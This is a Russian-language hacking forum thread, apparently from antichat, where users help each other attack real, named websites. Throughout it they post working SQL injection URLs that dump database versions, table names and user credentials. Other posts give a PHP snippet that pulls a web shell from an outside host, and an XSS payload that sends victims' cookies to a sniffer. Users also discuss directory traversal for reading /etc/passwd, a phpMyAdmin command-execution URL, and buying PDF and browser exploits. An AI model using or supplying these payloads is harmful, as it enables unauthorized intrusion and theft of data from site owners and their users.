Assembler, тебе сюда! http://forum.antichat.ru/forum76.html

еще один вопрос)
конструкция select+1+top+login+from+user+where+id=1 не выводит ошибки)
как я понимаю просто такого ид не существует?
select+top+1+start+at+2+login+from+user ругается на Incorrect syntax near '2'.

где то был топик на эту тему но ответа так и не увидел.
какие еще есть варианты вывести другие записи?)

mailbrush я сказал это чтобы малоли путь понадобиться при залитии файла (файл прив вроде включен)

Нужен скриптик на пхп
Чтобы когда зашол на эту пхп страницу(скрипт) то заметно заливался шелл на сайт
путь до сайта знаю(если понадобиться)

up. чуть подкоректировал чтобы было легче понимать :)

Ух блин... Это скуля? Какие колонки выводятся?

mailbrush я сказал это чтобы малоли путь понадобиться при залитии файла (файл прив вроде включен)



up. чуть подкоректировал чтобы было легче понимать :)
Насколько я понял тебя:
if($_GET['get_shell']=='yes')
copy('http://malicos.ru/shell.txt','/путь/имя_шелла');
/*
file_put_contents( '/путь/имя_шелла',file_get_contents('http://malicos.ru/shell.txt'));
и т.п. и т.п.

*/

Вопрос может не совсем в тему...
Какой сниффер лучше юзать для просмотра пакетов отправляемых браузером на сайты?

Вопрос может не совсем в тему...
Какой сниффер лучше юзать для просмотра пакетов отправляемых браузером на сайты?

Плагин к фалерфоксу, - LiveHTTP Headers

Можно сформировать просто страничку которая будет передовать пораметры голосования POST или GET, ты можешь это посмотреть на форме голосования какая переменная передаются какому скрипту и каким методом, а потом на сформированую страничку просто лей трафик и всё...

вот именно как узнать каким методом передаётся ответ на голосование и какая переменная соответствует тому или иному варианту я не знаю

вот именно как узнать каким методом передаётся ответ на голосование и какая переменная соответствует тому или иному варианту я не знаю ну это можно посмотреть глянув в "html код" страницы...
Ну или
скачай Naviscope для перехвата пакетов + InetCrack and AccessDiver для посылки пакетов ....

Перекопал много ресурсов но так никто и не ответил.
Как можно "слить" базу данных из локальной сети? Сервер базы крутится на Оракле.
Имеется связка логин\пасс для программ работающих с базой.
Как? Чем? Что еще нужно?

И так имееться сайт
URL сайта примерно такой:

http://nash-sait.ru/photo.php?image=http://nash-sait.ru/img/img001.jpg

Инклуд возможен но открываеться инклуд как картинка (то есть в конце дописываеться .jpg)
можно ли запрос image послать на мою картинку, причем в моей картинке есть шелл (то есть открываешь картинку команда в системе выполняеться)
так вот такой вопрос настиг
где будет выполняться сам код картинки? на моем хосте или на том где открылась картинка?
ММ, сомневаусь что это инклюд, так как файл с изображением не должен подключаться к php коду(не ну возможно и такое).Скорее всего там идет либо копирование этого файла на хост, либо он просто читаеться, а потом передаеться функции для работы с изображением.

Есть скуль, на любой запрос реагирует

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Пробывал и /**/ и разнообразные альтернативные варианты,окончание sql запроса так же пробывал разнообразные, всё равно такой же результат.
Подзапросы так же не работают.
Например id=211+or+substring(version(),1,1)=5-- плюётся ашыбкой

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or substring(version(),1,1)=5--' at line 1

Не могу даже подобрать кол-во полей.
В чём может быть проблема и как обойти?

Попробуй с кавычкой - id=-1' ..., если пробовал и не помогло - облом, скули нет.

Видимо облом.С кавычкой то же самое...

Imperou$ Линк давай посмотрим, что-то мне кажется, что ты просто что-то не так делаешь, а скуль всё-же есть.

Не хочешь в паблик, можешь мне в ПМ кинуть

Imperou$, а может проблемы в обозначении коментария -- ?

попробуй /* # +--+ --+ +-- и т д...

-m0rgan- всё уже решили, там лимит.

Кстати, не пояснишь зачем вот такие комментарии?
"+--" ,"+--+"
Синтаксис мускула требует хотя-бы один пробел ПОСЛЕ -- . Всё остальное извраты :)

Доброго всем времени суток, у меня такой вопрос:
Если какой то способ обхода слеширования кавычек или какой то способ не использовать кавычки при указания адресса записываемого файла при INTO DUMPFILE, INTO OUTFILE - %27 и указание в хексе(ну мало ли :)) адресса не проходит, возможно ли это как то обойти?

если я тебя правильно понял, то при указывание файла в хексе то кавычки ставить не надо например load_file('/etc/passwd') = load_file(hex of /etc/passwd without '=0x2f6574632f706173737764)

если я тебя правильно понял, то при указывание файла в хексе то кавычки ставить не надо например load_file('/etc/passwd') = load_file(hex of /etc/passwd without '=0x2f6574632f706173737764)
:) Ты меня не правильно понял, LOAD_FILE та понятно что можно прохексить(прочарить) адресс файла, а меня интересует именно INTO OUTFILE ,INTO DUMPFILE, просто есть куча сайтов где слешируються кавычки а файл привилегии есть, но кроме чтения ничего не выходит, вот и интересует можно ли как то указать адресс файла назначения не прибегая к кавычкам при записи

Он хочет OUTFILE выполнить...а не LOAD_FILE.
Нет..нельзя обойти.

2 PaCo
Если есть, файл прив, и ты хочешь записать шелл, то следовательно(скорее всего) у тебя есть и пути ... Читай файлы сайта, и возможно найдешь 2-ной запрос, благодаря которому, и получится залить шелл в твоих условия...
Читай вот это http://forum.antichat.ru/showpost.php?p=663815&postcount=39

2 PaCo
Если есть, файл прив, и ты хочешь записать шелл, то следовательно(скорее всего) у тебя есть и пути ... Читай файлы сайта, и возможно найдешь 2-ной запрос, благодаря которому, и получится залить шелл в твоих условия...

:) ну это все понятно и естествено, просто хотел узнать именно по кавычкам в INTO OUT и INTO DUMP для экономии времени.

http://www.vzlom-icq.ru/login.php ето что?

Это ошибка в скрипте login.php

её можно использовать какимто образом?

её можно использовать какимто образом?
нет.

>>её можно использовать какимто образом?

Это не уязвимость, разве что светит пути...

Это ошибка в коде при его написании, она не вызвана побочными факторами...

ты знаешь пути до сервера.

Ток это сложно назвать багой, так дополнение...(

если я обнаружил xss на поддомене к примеру search.sait.ru
то можно ли стырить куки с sait.ru?
Или куки тыряться токо с поддомена если я зашлю челу каторый авторизован на sait.ru?

если я обнаружил xss на поддомене к примеру search.sait.ru
то можно ли стырить куки с sait.ru?
Или куки тыряться токо с поддомена если я зашлю челу каторый авторизован на sait.ru?
Нет, поддомен это уже другой сайт, куки там будут свои.
Если в куках конечно не прописываеться domain:.sait.ru

если я обнаружил xss на поддомене к примеру search.sait.ru
то можно ли стырить куки с sait.ru?
Или куки тыряться токо с поддомена если я зашлю челу каторый авторизован на sait.ru?


Бывает так, что куки ставятся для всех поддоменов.

То есть так

Set-Cookie: cooka=value; host=*.domen.com


На майлру так. Поэтому куки с одного домена доступны на другом.

Бывает так, что куки ставятся для всех поддоменов.

То есть так

Set-Cookie: cooka=value; host=*.domen.com


На майлру так. Поэтому куки с одного домена доступны на другом.
Посмотри по внимательнее header на том же mail.ru там идет
Set-Cookie: Mpopl=79670372; expires=Thu, 05 Mar 2009 16:08:57 GMT; path=/; domain=.mail.ru
насчет host=*.domen.com - не слышел не разу, может и так работает.
Я основываюсь на http://www.faqs.org/rfcs/rfc2109 и http://www.faqs.org/rfcs/rfc2965 - там нет ничего про host

вот что обнаружыл(чисто случайно))))

Ошибка БД

Error Number: 1267

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation '='

SELECT * FROM (`users`) WHERE `name` = 'й' LIMIT 1

наскоко я понял там когда вводиш руские символы вылезает такая ошыбка. А можно как то раскрутить ето все дело??? я просто такое раньше никогда не видел

если я обнаружил xss на поддомене к примеру search.sait.ru
то можно ли стырить куки с sait.ru?
можно
Из browser security handbook:
domain=example.com is exactly equivalent to domain=.example.com

@zifanchuck
в случае если кавычки не фильтруются

@zifanchuck
в случае если кавычки не фильтруются
подставил ковычку ошыбки нету((( а жаль

Посмотри по внимательнее header на том же mail.ru там идет
Set-Cookie: Mpopl=79670372; expires=Thu, 05 Mar 2009 16:08:57 GMT; path=/; domain=.mail.ru
насчет host=*.domen.com - не слышел не разу, может и так работает.
Я основываюсь на http://www.faqs.org/rfcs/rfc2109 и http://www.faqs.org/rfcs/rfc2965 - там нет ничего про host


Да, я про это и говорил. Перепутал просто - не host, а domen, и не *.mail.ru, а просто .mail.ru.

Куки ставятся на все поддомены.

2 zifanchuck давай урлу

Microsoft OLE DB Provider for SQL Server error '80040e21'

Unclosed quotation mark before the character string ''.

/inc/connection.asp, line 48


это бага?

если да то неполучается узнать даже версию

/details.asp?id=699882982&dme_code=1%20or%201=@@version--

в ответ получаю
Microsoft OLE DB Provider for SQL Server error '80040e21' Incorrect syntax near the keyword 'or'. /inc/connection.asp, line 48

or 1=(select @@version)

F4R, читай литературу по MSSQL!

дак я читал вчера весь день...

на
/details.asp?id=699882982&dme_code=or 1=(select @@version)

выводит

Microsoft OLE DB Provider for SQL Server error '80040e21'

Incorrect syntax near the keyword 'or'.

/inc/connection.asp, line 48

http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=li%20zdes'%20ili%20prosto?

что здесь такое?

http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=&mod=prosto

http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=li%20zdes'%20ili%20prosto?

что здесь такое?

http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=<script>alert(/dd/)</script>
:) Не более...

http://www.tamasitheatre.ro/ro/1.html?cikk_id=3780+union+select+null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null--


version() PostgreSQL

не могу найти вывод, или все таки слепая?

есть скуля... вроде. но что то не так
Фильтрация union, select
Работает
http://www.topnews.ru/citation.php?autor=749+order+by+8/*
Неработает
http://www.topnews.ru/citation.php?autor=749+order+by+8/*union*//*

Gorev
http://www.tamasitheatre.ro/ro/1.html?cikk_id=-3780+union+select+null,null,version(),null,4,null, null,null,1,null,null,null,null,null,null,2,3--

/details.asp?id=699882982&dme_code=or 1=(select @@version)


вылезает ошибка:

Microsoft OLE DB Provider for SQL Server error '80040e21'

Incorrect syntax near the keyword 'or'.

/inc/connection.asp, line 48



кто что может сказать?

кто что может сказать?
Я могу сказать вот что:

ОТСТАНЬ ОТ ЭТОГО САЙТА.

И лучше тебе прислушаться :)

Я могу сказать вот что:

ОТСТАНЬ ОТ ЭТОГО САЙТА.

И лучше тебе прислушаться :)
а ты знаешь что это за сайт?


мне всего лишь хочется узнать версию и всё..

а ты знаешь что это за сайт?
http://www.google.com/search?client=opera&rls=ru&q=dme_code&sourceid=opera&ie=utf-8&oe=utf-8

фигасе
)

ну это можно посмотреть глянув в "html код" страницы...
Ну или
скачай Naviscope для перехвата пакетов + InetCrack and AccessDiver для посылки пакетов ....

А аналоги под линуху есть?

А аналоги под линуху есть?
захват: wireshark, ettercap, ngrep, tcpdump
посылка: netcat, curl

А аналоги под линуху есть?
Burp Suite, WebScarab

Есть скуля======================================== ================
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1'
================================================== ==============
Слобцов 7......
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+order+by+7--
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+order+by+8--
================================================== ==============
Когда ввожу----- http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+union+select+1,2,3,4,5,6,7--
Всё равно пишит-------The used SELECT statements have a different number of columns
================================================== ==============
Что такое? Как это обойти?
================================================== ==============
P.S===== А так же http://www.higherhacknell.co.uk/recipes.php?id=-1' ! Нельзя перебрать с помощью ORDER BY(Редериктит сразу).....Что в таком случае возможно сделать?
Заранее спасибо! )) (Если где-то обсуждалось, то извините, не видел))))
================================================== ==============
================================================== ==============

http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=5--

http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=4--

http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=-1+and+substring(version(),1,1)=3--

3-тяя ветка, в ней union select непашет!

3-тяя ветка, в ней union select непашет!
Мде

А мне кажется пятая
http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+and+substring(version(),1,1)=5--+

+++AndreyDevil+++
Там двойной запрос

а вторая отлично перебирается, просто кавычку нужно ставить
http://www.higherhacknell.co.uk/recipes.php?id=-1'+union+select+1,2,concat_ws(0x3a,User(),Database (),Version()),4,5,6,7,8,9,0,11/*

кто что может сказать?
там процедура угадывай синтаксис
domodedovo.ru/ru/main/timetablenew/details.asp?id=731323262&dme_code=la,la

http://listok.ura.ru/photo/index.php?id=6'
есть скуля... вроде. но что то не так
http://www.vedomosti.ru/newsline/index.shtml?2009/03/05/738007'
поможете?)

VITАL
https://forum.antichat.ru/showpost.php?p=1152922&postcount=5810

Тебе по 2 раза нужно отвечать? :)

jokester
спасибо) не заметил... да там вижу нифига не получится.. а второй? хз... думаю тоже не выйдет

http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~23+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63 ,64.html

Великий Jokester помоги, вроде вывод есть а не выводит.Спасибо заранее.

Всё, что больше одного символа, при попытке подставить значение (хоть 11 вместо 1) - вызывает ошибку.

Пока только так вижу:

http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~23+and+substring(version(),1,1)=5.html

Там рядом полноценная инъекция...

http://www.turisminromania.ro/index.php?judet=10+and+1=0+union+select+1,version( ),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49--

thanks to R1dex , разобрался

надо спать больше, зациклился на одном и бошка дальше не думает...всем спасибо и спокойной ночи

Всё, что больше одного символа, при попытке подставить значение (хоть 11 вместо 1) - вызывает ошибку.
Не в поле дело , а в общей длинне строки
Там рядом полноценная инъекция...

И эта ничем не хуже, просто ненужное надо убрать :)
http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~2+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4+from+information_schema.tables.html

гы, точняк. Просто с такого кол-ва полей неплохо экономица за счет урезания по одному символу с каждого числа. Риспект.

что тут у нас такое?

http://prescott-az.gov/news/index.php?id=1468+order+by+12/* - 12 типа..
http://prescott-az.gov/news/index.php?id=1468+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12/* а не работает...

что тут у нас такое?

http://prescott-az.gov/news/index.php?id=1468+order+by+12/* - 12 типа..
http://prescott-az.gov/news/index.php?id=1468+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12/* а не работает...
Нету вывода.Юзай как слепую.
http://prescott-az.gov/news/index.php?id=1468+and+substring(version(),1,1)=4/*

Вывода нет. Один запрос переходит в другой.

И эта ничем не хуже, просто ненужное надо убрать 2+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4+from+information_schema.tables.html
вот именно, мы же не для феньки разбирали это всё)
1+union+select+tables.*,tables.*,tables.*,1+from+i nformation_schema.tables.html
tables:
TABLE_CATALOG
TABLE_SCHEMA
TABLE_NAME
TABLE_TYPE
ENGINE
VERSION
ROW_FORMAT
TABLE_ROWS
AVG_ROW_LENGTH
DATA_LENGTH
MAX_DATA_LENGTH
INDEX_LENGTH
DATA_FREE
AUTO_INCREMENT
CREATE_TIME
UPDATE_TIME
CHECK_TIME
TABLE_COLLATION
CHECKSUM
CREATE_OPTIONS
TABLE_COMMENT

& columns:
TABLE_CATALOG
TABLE_SCHEMA
TABLE_NAME
COLUMN_NAME
ORDINAL_POSITION
COLUMN_DEFAULT
IS_NULLABLE
DATA_TYPE
CHARACTER_MAXIMUM_LENGTH
CHARACTER_OCTET_LENGTH
NUMERIC_PRECISION
NUMERIC_SCALE
CHARACTER_SET_NAME
COLLATION_NAME
COLUMN_TYPE
COLUMN_KEY
EXTRA
PRIVILEGES
COLUMN_COMMENT

Ситуация.
Получил доступ в админку, через аплоад картинок (другого нет) заливаю шелл (допустим shell.php).
Скрипт меняет название шелла и расширение, на что то типа uploadimage.gif?3451
когда обращаешься к этой картинке-в браузере показывается код шелла.Как получить нормальный шелл?
Доступ в админку получил через скулю, файл прив пашет, могу прочитать /etc/passwd и ещё несколько.Но не знаю папку с правами на запись, поэтому через скулю залить шелл не могу.
Выручайте!

Как понять "не знаю папку на запись" ?

Лей в ту папку, куда из админки заливается твоя картинка, права должны быть

Я в неё и пробовал, нифига =(

Я в неё и пробовал, нифига =(
Так что ты хочешь услышать? Если скрипт меняет расширение файла при заливке, то ничего ты тут не сделаешь. Ищи папку на запись, и лей через скуль. Или ищи инклуд, и инклудь свой шелл

Ситуация.
Получил доступ в админку, через аплоад картинок (другого нет) заливаю шелл (допустим shell.php).
Скрипт меняет название шелла и расширение, на что то типа uploadimage.gif?3451
когда обращаешься к этой картинке-в браузере показывается код шелла.Как получить нормальный шелл?
Доступ в админку получил через скулю, файл прив пашет, могу прочитать /etc/passwd и ещё несколько.Но не знаю папку с правами на запись, поэтому через скулю залить шелл не могу.
Выручайте!

Возможно картинка хранится в базе, а не в файловом варианте. И 3451 некий айди картинки вытаскивающий и показывающий ее. Второй вариант - от картинки обрезается расширение и настоящее имя ее вроде 3451.jpg ... Ну или много еще чего. Слишком размывчато все описал.

Куда не пробую, не выходит...

"Can't create/write to file '/home/httpd/vhosts/site.org/httpdocs/images/c.php' (Errcode: 13)"
Искал папку tmp, чаще всего просто встречал-не нашёл.

Инклуда нет, я не нашёл.Двиг баганый, я уже заливал на многие такие же через админку, нормально аплоадило, расширение не менялось.Вот первый раз столкнулся.
Если у кого есть желание посмотреть, могу в пм скинуть данные для доступа в админку и саму скулю.

Не хватает прав, ищи диру доступную для записи..
Можешь скинуть в личку, посмотрю, ради интереса.

Народ подскажите какой префикс у таблиц форума http://www.stavochka.com/forum/index.php а то я ужо за''''ся =)

http://up.cih.ms/ettee/sql/

По дефолту
phpbb_

jokester, там не дефолт... Не канает phpbb_ Вот смотри сам..
http://www.new.stavochka.com/view.php?contentid=999999999999%20union%20select%2 01,2,3,4,username,6,7,8,9,10%20%20from%20phpbb_use rs--

Есть подозрение что там ваще без префикса

http://www.new.stavochka.com/view.php?contentid=999999999999%20union%20select%2 01,2,3,4,username,6,7,8,9,10%20%20from%20users--
Но тогда почему нету user_password ?? блин.

http://www.new.stavochka.com/view.php?contentid=999999999999+union+select+1,2,3 ,4,concat_ws(0x2F,username,userpassword),6,7,8,9,1 0+from+users--

Смотри сурс странички авторизации

<input name=userpassword size=18 type=password>

Бывает, что совпадает с именем колумна (но не всегда конечно). А таблицы форума могут лежать в другой базе, к которой вообще может не быть доступа

ElteRUS, спс. + воткнуть не могу седня уже исчерпал лимит!!

Привет, сорри за нубский вопрос, залил пхп шелл на один сайт и обнаружил, что кроме него там еще две сотни, файл я могу залить папку к каждому, и вот я заливаю шелл в нужную мне папку, дергаю из браузера, но пхп не интерпретируется, файлы используются cfm (получается в одной папке пхп катит, в другой - нет), я бы залил хтаксес, но там Microsoft-IIS/5.0 сервак. Как залить шелл? Спасибо

зы: нужно для общего развития)

Че-то я не пойму как раскрутить её
http://www.fontsmith.com/custom.php?id=807

S0ulVortex, слепая скуля.
http://www.fontsmith.com/custom.php?id=9'+union+select+1,2,3,4,5,6,7,8,9/*
проблема в том что стоит два (или четыре) подряд запроса с разным количеством полей в запросе и параметр подставляется туда и туда. Получается если заюзать количество столбиков в юнионе которое равно количеству в первом запросе, то второй выдаст ошибку, если равное количеству во втором то ошибку выдаст первый, если вообще левое, то ОБА выдадут ошибку (это и есть твои 4 ошибки).

Вопрос:
допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>

Вопрос, как её заносить в ссылку по которой должен отклик от жертвы произойти со скоиптом ("><script>alert(document.cookie)</script>) или без ?????

http://torg.mail.ru/news/?0103/2009"><script>img = new Image(); img.src = "http://сниффер?"+document.cookie;</script>
так. статьи почитай, в них все это описано. от Micr0b'a например.

так. статьи почитай, в них все это описано. от Micr0b'a например.

Да я уже везде полазил.
Именно этот момент не уточнён, со скриптом или без.

Народ чет не понятен вопрос шелл через картинку
вставляю в конец файла(.gif) (открытым блокнотом) к примеру

<?php
echo "zzzzz"
?>

Он у меня заливает но картинка становиться большой 8*292 x 8*292 пикселей
И не выводиться "zzzzz"
Что делать? С чем это едят?

Задумывался над тем же вопросом. Хорошая статья разора.

http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/

YoriK мне эта статья не нужна так как там юзаеться программа спец. а мне нужно через блокнот это все

всё начиналось очень хорошо, пока дело не дошло до вывода админских логинов:паролей..
значит запрос такой:
=-24+union+select+1,concat(tp)+from+events--


и в ответ ничего кроме всяческих ошибок.. что можно сделать?

concat(tp) - что это? убери concat

=-1+union+select+1,tp+from+events--

тоже самое!

Проверь, есть ли записи в таблице и в какой она бд.

мда, информации море:

1. Для вывода одного параметра concat нафинг не нужен (тогда уже group_concat)
2. Проверить правильность написания именя поля + имени таблицы
3. Попробуй unhex(hex(tp))
4. Ссылку в студию или в личку
5. "кроме всяческих ошибок" - текст ошибок когда в студии - 99% успешных подсказок.
6. Пустая табла - пробуй считать - -24+union+select+1,count(tp)+from+events--

по п.6 - скорее всего 0 выведет

покажи ссылку что догадки строить, так до утра будешь искать

=-1+union+select+1,tp+from+events--

тоже самое!
таблица events существует? поле tp существует?
попробуй для начала
-1+union+select+1,2--

да всё сушествует..
кароче ошибка:
No database selected : никакая база данных не выбранна!

да всё сушествует..
кароче ошибка:
No database selected : никакая база данных не выбранна!
Заканчивай с гаданием. Без линка на вопрос не ответить. Я готов поспорить, что там всё элементарно, и тебе уже ответили на вопрос. Не хочешь сюда линк, кто-то там в приват просил, а гадания на 10 страниц ни к чему

https://forum.antichat.ru/thread104591.html
вопросы 2.3.4. Если после прочтения ответов на эти вопросы ничего не получится , линк или сюда или в ПМ. Я это писал для того, что-бы вопросы по кругу не ходили, но видимо бесполезно потратил время

Подскажите на каком движке сайт и если можно какие дыры есть http://space.lv

Нагуглил, что проблема решается, если не трогать скрипт profile.php, то есть не заходить на свою страницу и на страницы других пользователей. Но вот вопрос возникает. Как я понимаю сам этот скрипт находится в отдельном файле где-то в кеше и при загрузки странички пользователя он просто исполняется и отправляет инфу о том, что ты онлайн. Но если он находится в кеше стало быть его можно пропатчить что-бы он как бы исполнялся но инфу не отправлял. Честно говоря я ничего не понимаю в этой системе. это всё только мои догадки. Если что-то не так то поправьте меня. Понятно, что можно тупо не заходить на страницы пользователей, но хочется именно заходить и быть offline.

Где под firefox 3 в ubuntu можно найти сам этот profile.php ?

http://www.zabihah.com/da.php?id=../
можно ли что нибудь проинклудить, при вот таом префиксе..

Подскажите здесь есть вывод данных -
http://www.sklad-kadri.si/kadrovske/?k=izpis&id=5061112000123123+union+select+1,2,3,4,5,6--+ ?

Тут:

http://www.sklad-kadri.si/kadrovske/?k=izpis&id=-5061112000123123+union+select+1,2,3,4,5,6,7,8,9,0, 11,12/*

Есть пасы от Апачевской авторизации(Basic). Шифруются ли они чем-нибудь?

Есть пасы от Апачевской авторизации(Basic). Шифруются ли они чем-нибудь?
как они выглядят покажи

В basic используется Base64 шифрование.

Для передачи - шифрование base64, но в самих файлах (.htpasswd) пассы обычно зашифрованы DES'ом

http://www.zabihah.com/da.php?id=../
можно ли что нибудь проинклудить, при вот таом префиксе..

http://www.zabihah.com/da.php?id=1/../../../../../index

:confused:
Вопрос:
допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>

Вопрос, как её заносить в ссылку на моём хосте по которой должен отклик от жертвы произойти, со скриптом ("><script>alert(document.cookie)</script>) или без ?????

Так и заноси, только добавь адрес сниффера и закодируй содиржимое алерта...

если хош украсть куки тебе ишо нужен сниффер!
тута усе расписано было!

Так и заноси, только добавь адрес сниффера и закодируй содиржимое алерта...

Т.е. выглядеть будет примерно так???:

http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>'><script src=http://miliniva.narod.ru/js.js></script>

А в Js.js: img=new Image();img.src="http://antichat.org/s/Seshh.gif?"+document.cookie;

Как быть offline vkontakte.ru
Нагуглил, что проблема решается, если не трогать скрипт profile.php, то есть не заходить на свою страницу и на страницы других пользователей. Но вот вопрос возникает. Как я понимаю сам этот скрипт находится в отдельном файле где-то в кеше и при загрузки странички пользователя он просто исполняется и отправляет инфу о том, что ты онлайн. Но если он находится в кеше стало быть его можно пропатчить что-бы он как бы исполнялся но инфу не отправлял. Честно говоря я ничего не понимаю в этой системе. это всё только мои догадки. Если что-то не так то поправьте меня. Понятно, что можно тупо не заходить на страницы пользователей, но хочется именно заходить и быть offline.

Где под firefox 3 в ubuntu можно найти сам этот profile.php ?

Здравствуйте нашел уязвимость Apache Tomcat v.5.5.26 Directory Traversal на одном игровом сервере http://la2midland.ru вот и мне сканер выдает такую строку http://la2midland.ru:80/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd что с этим можно сделать?

^YaHoo^ ну ты типо читаешь файлы на сервере, ищи конфигурационные файлы и бери оттуда логины и пассы

спс)

^YaHoo^ ну ты типо читаешь файлы на сервере, ищи конфигурационные файлы и бери оттуда логины и пассы
Где он читает файлы? покажи мне содержимое файла..етс пассв который он прочитал?....Лично он мне ничего не выдал....
Поэтому поиметь с этого ничего нельзя.

в принципе в etc/passwd храняися пассы но зашифрование...
так же можеш поискать такие полезности как:
/etc/httpd/conf/httpd.conf
/etc/php.ini
/etc/hosts
/etc/my.conf

дальше сам гляди, у меня сайт вапще не открылся =/

2 -m0rgan- мне кажется что в etc/passwd нету ничего интересного, а пассы вроде в shadow хранятся

2 DimOnOID ты прав, мне тоже ничего не выдало, но увидев /etc/passwd дал ответ иcxодя из собственных соображений

в принципе в etc/passwd храняися пассы но зашифрование...
так же можеш поискать такие полезности как:
/etc/httpd/conf/httpd.conf
/etc/php.ini
/etc/hosts
/etc/my.conf
/etc/passwd Уже стотыщь лет не хранит хешши паролей..и не обяз в папке /etc/ будут лежать эти файлы..на каждой машине они как правило по разному..

Gorev угу..а на shadow прав не хватит.

получается с этого поиметь ни чего нельзя да?

По дефолту, а по дефолту чаще всего, они лежат в /etc/ =)

>>/etc/passwd Уже стотыщь лет не хранит хешши паролей

точно не знаюсь на апаче но что то там расшифровуют)

Скажите пожалуйста, есть ли в паблике эксплоиты Snapshot (ie6,ie7), util.printf (pdf), Collab.collectEmailInfo (pdf). Эксплоиты продаются в различных связках, но дата продаж - старая, а сплоиты актуальны. Черкните в ЛС, если кто может помочь.

Общеобразовательный вопрос: как происходит внедрение ява-скрипт эксплоита в сам файл .pdf (к вопросу о pdf-эксплоитов)?

Как использовать дыру в пхпмайадминке?:



http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by=%22])%20OR%20passthru($_GET[ccmd]);%20//&sort_order=desc&token=[my_valid_token]&ccmd=ls


Мне выдаёт в Доступе отказано.Че за токен ставить я не знаю =_=.Посему прописал так,как выше...Версия 2.9.1.1

чавой горишь там расшифровуют? о_О ежели инклуд у чувака, неполохо бы попробовать в логи писануть пиайчпи код и заинклудить. как это делается- на ачате инфа есть. Там же вроде бы говорится о читалке, а не об инклуде.

Как использовать дыру в пхпмайадминке?:



http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by=%22])%20OR%20passthru($_GET[ccmd]);%20//&sort_order=desc&token=[my_valid_token]&ccmd=ls


Мне выдаёт в Доступе отказано.Че за токен ставить я не знаю =_=.Посему прописал так,как выше...Версия 2.9.1.1




token - параметр в адресной строке. Например так - http://localhost/phpmyadmin/index.php?db=mysql&token=206136e5c98e1cd2fa26fbd104ebc700

http://comunist.md/index.php?idPaper=89/**/union+select+1,2,3,4,5,6,7+limit+1,1--

Обьясните пожалуйста зачем ставить в конце запроса
limit+1,1 . Почему не работает без LIMIT ?
(когда не получилось руками запустил в програме Sql Injection tool , и там есть галочка типа - использовать Limit 1,1 )

Всё отлично работает
http://comunist.md/index.php?idPaper=-89 union select 1,2,concat_ws(0x3a,User(),Database(),Version()),4, 5,6,7--+

А всётаки зачем в Sql injection tool 4 есть параметр LIMIT 1,1 ? Почему например в моем случае надо его ставить,как именно я составил запрос. (я забыл что надо ставить несуществуюшие данные типа idPaper=-89 )

И что означает {1} (сами ковычки { } ) в проге Sql injection tool ?:
Printable fields : {1},3,4,5,6,7

2 Jokester,что делать если в скуле урезаются длина запроса

А всётаки зачем в Sql injection tool 4 есть параметр LIMIT 1,1 ? Почему например в моем случае надо его ставить,как именно я составил запрос. (я забыл что надо ставить несуществуюшие данные типа idPaper=-89 )

И что означает {1} (сами ковычки { } ) в проге Sql injection tool ?:
Printable fields : {1},3,4,5,6,7

Printable fields ( ака печатное поле)
скобками ты выделяешь столбец в который выводить данные

{1},3,4,5,6,7 - в перввый

2 Jokester,что делать если в скуле урезаются длина запроса

запроса или вывода ? если вывода то через substring ... а может я и ошибаюсь ...

вывода извиняюсь, через substring я знаю, есть ли другой способ?

сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.

union+select+1,2,3,4,5,6,7,8,9,10,11,12,13

заменить на

